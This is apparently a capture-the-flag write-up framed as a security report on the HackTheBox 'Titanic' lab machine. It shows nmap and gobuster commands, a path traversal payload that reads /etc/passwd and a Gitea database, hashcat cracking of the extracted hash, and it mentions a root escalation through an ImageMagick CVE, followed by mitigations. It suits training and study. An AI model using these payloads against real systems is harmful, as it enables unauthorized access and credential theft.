Technical Report
Detailed analysis for technical teams, covering methodologies, tools, and findings.
Technical Security Report: "Titanic" System
Purpose of the Report
This document provides a detailed technical assessment of the Titanic machine from HackTheBox. The goal of this assessment was to identify security vulnerabilities, exploit them, and provide recommendations to mitigate potential risks.
Methodology
The security evaluation followed a structured penetration testing approach:
Reconnaissance: Identifying open ports and services using scanning tools.
Enumeration: Gathering information on the web application and system configuration.
Exploitation: Utilizing known vulnerabilities to gain unauthorized access.
Privilege Escalation: Escalating privileges to gain root access to the system.
Detailed Findings
1. Reconnaissance
Tool Used: nmap
Command Executed:
sudo nmap -F -T5 -sCV <ip_target>
Results:
Port 80: Open (Apache httpd 2.4.52)
Port 22: Open (OpenSSH 8.9p1 3ubuntu0.10)
2. Enumeration
Web Enumeration:
Accessing
http://<ip_target>:80
redirected totitanic.htb
.Added
titanic.htb
to/etc/hosts
for proper resolution.Navigating the website revealed a functional "Book Your Trip" form that generated a JSON file.
Directory Bruteforcing:
Tool Used:
gobuster
Command Executed:
gobuster dir -u http://titanic.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Results: Found
/download
and/book
directories
3. Exploitation
Local File Inclusion (LFI):
Exploited
/download?ticket=../../../../etc/passwd
to retrieve sensitive system files.Retrieved
/etc/hosts
, revealingdev.titanic.htb
subdomain.Accessed
dev.titanic.htb
and discovered Gitea service.Created a test account, found a repository with MySQL credentials.
Unable to access MySQL, continued to search for sensitive files.
Found
gitea.db
via LFI:/download?ticket=/home/developer/gitea/data/gitea/gitea.db
.Extracted user hash and salt, cracked password using hashcat.
Hashcat Command:
hashcat -m 10900 hashdeveloper.txt /usr/share/wordlists/rockyou.txt
4. Privilege Escalation
Searched
/opt
directory and foundidentify_images.sh
script.Discovered ImageMagick binary vulnerable to CVE-2024-41817 (Arbitrary Code Execution).
Created a malicious shared library to execute arbitrary commands.
Executed payload, obtained root access and the root flag.
Recommendations
Short-term Actions:
Implement proper file validation to prevent LFI vulnerabilities.
Enforce strict password policies and use multi-factor authentication.
Regularly update and patch software, including ImageMagick.
Long-term Actions:
Conduct regular security assessments and code reviews.
Implement network segmentation to isolate sensitive services.
Train staff on secure coding and vulnerability mitigation.
Conclusion
The assessment of the Titanic machine demonstrated multiple security vulnerabilities, including LFI and arbitrary code execution. Addressing these issues through regular updates, secure authentication, and access control measures will significantly enhance the system’s security posture and reduce the risk of exploitation.
Last updated